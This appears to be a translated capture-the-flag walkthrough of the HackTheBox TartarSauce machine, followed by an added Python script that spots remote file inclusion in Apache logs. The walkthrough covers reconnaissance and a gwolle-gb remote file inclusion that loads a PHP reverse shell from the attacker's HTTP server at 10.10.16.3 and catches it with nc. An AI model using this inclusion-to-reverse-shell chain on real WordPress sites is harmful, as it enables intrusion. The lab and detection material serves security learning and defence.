Reconnaissance
Scan it directly with nmap
root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:21 EDT
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.098s latency).
Not shown: 65467 closed ports, 67 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 26.34 seconds
root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap -sCV -p 80 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:25 EDT
Nmap scan report for 10.10.10.88
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds
It turns out to be a purely web-facing box, so scan it with dirsearch.
Port 80 reconnaissance
dirsearch reveals that the site has a robots.txt file.
It lists five directories, but all five are rabbit holes; I wasted a lot of time on those pages...
It does, however, also expose a path: /webservices
Brute-forcing that path with gobuster and the medium wordlist turns up a /wp directory, which suggests the box runs WordPress.
Since there is a WordPress install, we dig into it further.
wpscan --url http://tartarsauce.htb/webservices/wp/
wpscan --url http://tartarsauce.htb/webservices/wp/ --enumerate p,t,u
wpscan --url http://tartarsauce.htb/webservices/wp --enumerate p --plugins-detection aggressive
Here the box author uses a decoy: the version was edited to look like a 2.x release, but it is really still 1.5, so wpscan has to be run in aggressive mode.
This can be seen in one of the plugin readme files.
_______________________________________________________________
[WPScan ASCII-art banner]
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
...
[+] We found 3 plugins:
[+] Name: akismet - v4.0.3
| Last updated: 2018-05-26T17:14:00.000Z
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[!] The version is out of date, the latest version is 4.0.6
[+] Name: brute-force-login-protection - v1.5.3
| Latest version: 1.5.3 (up to date)
| Last updated: 2017-06-29T10:39:00.000Z
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
[+] Name: gwolle-gb - v2.3.10
| Last updated: 2018-05-12T10:06:00.000Z
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] The version is out of date, the latest version is 2.5.2
[+] Enumerating installed themes (only ones marked as popular) ...
...
Escalating to www-data
Since we found gwolle, we can try gwolle's remote (cross-domain) file inclusion.
The concrete steps are as follows (the exploit written by the vulnerability's discoverer can actually be found in searchsploit):
1. Start a small HTTP server with Python
python -m SimpleHTTPServer 12345
Note that the directory your shell is in when you run this is the directory the server shares.
2. In the shared folder, create a reverse shell script named wp-load.php. I used /usr/share/webshells/php/php-reverse-shell.php, the msf script; remember to change the host and port inside it.
Note the reason for this filename: it is really just for convenience.
└─# python -m SimpleHTTPServer 12345
Serving HTTP on 0.0.0.0 port 12345 ...
10.10.10.88 - - [28/Dec/2021 19:38:11] "GET /wp-load.php HTTP/1.0" 200 -
10.10.10.88 - - [28/Dec/2021 20:07:40] "GET /b.sh HTTP/1.1" 200 -
When testing the connection I found that this cross-domain access fetches that file directly, so there is no need to append the filename.
3. Start an nc listener
4. Request the link with curl, or just open it in a browser
curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.3:12345/
Note: change the port to the one in your own script, and the URL must end with a trailing slash after the port.
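From the defender's side, the request in step 4 is exactly what this inclusion looks like in the web server's access log: a plugin endpoint receiving a parameter whose value is a URL pointing at another host. The following Python script is an added example, not part of the original write-up or of the gwolle-gb plugin. It parses Apache combined-format log lines and flags any query parameter whose (percent-decoded) value begins with a remote or PHP-wrapper scheme, then summarises hits per source address. The log lines are constructed for the example; the attacker host 10.10.16.3 and the gwolle-gb path are taken from the write-up, while the timestamps, user agents and benign requests are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format log lines (sample data for this example).
# Lines 1 and 2 model the curl request from the write-up, once plain and once
# percent-encoded; the remaining lines are benign traffic, including a request
# to the same endpoint with a local path, which this rule deliberately ignores.
SAMPLE_LOG = """\
10.10.16.3 - - [28/Dec/2021:19:38:10 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.3:12345/ HTTP/1.1" 200 512 "-" "curl/7.74.0"
10.10.16.3 - - [28/Dec/2021:19:40:02 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http%3A%2F%2F10.10.16.3%3A12345%2F HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.16.9 - - [28/Dec/2021:19:41:15 +0000] "GET /webservices/wp/?p=1 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.10.16.9 - - [28/Dec/2021:19:42:30 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=/var/www/html/webservices/wp/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.16.9 - - [28/Dec/2021:19:43:01 +0000] "GET /robots.txt HTTP/1.1" 200 230 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A parameter value starting with one of these schemes asks PHP's include/require
# machinery for a remote file or a stream wrapper instead of a local path.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:", "expect://")


def find_rfi_attempts(log_text, schemes=REMOTE_SCHEMES):
    """Return one dict per query parameter whose value points at a remote resource."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl already decodes one layer of percent-encoding; decoding
            # once more catches double-encoded values such as %2568ttp%253A...
            decoded = unquote(value).strip().lower()
            if decoded.startswith(schemes):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "path": parts.path,
                    "param": name,
                    "value": unquote(value),
                    "status": int(m.group("status")),
                })
    return hits


def summarize_by_source(hits):
    """Count flagged requests per client address, for alert triage."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} {h["path"]} {h["param"]}={h["value"]} -> {h["status"]}')
    print("per source:", summarize_by_source(found))
```

Run against a real access log by replacing SAMPLE_LOG with the file's contents. A 200 status on a flagged request is the serious case: the include resolved, so the next thing to look for is an outbound connection from the web server to the host named in the parameter, which is what the SimpleHTTPServer log above shows from the other side.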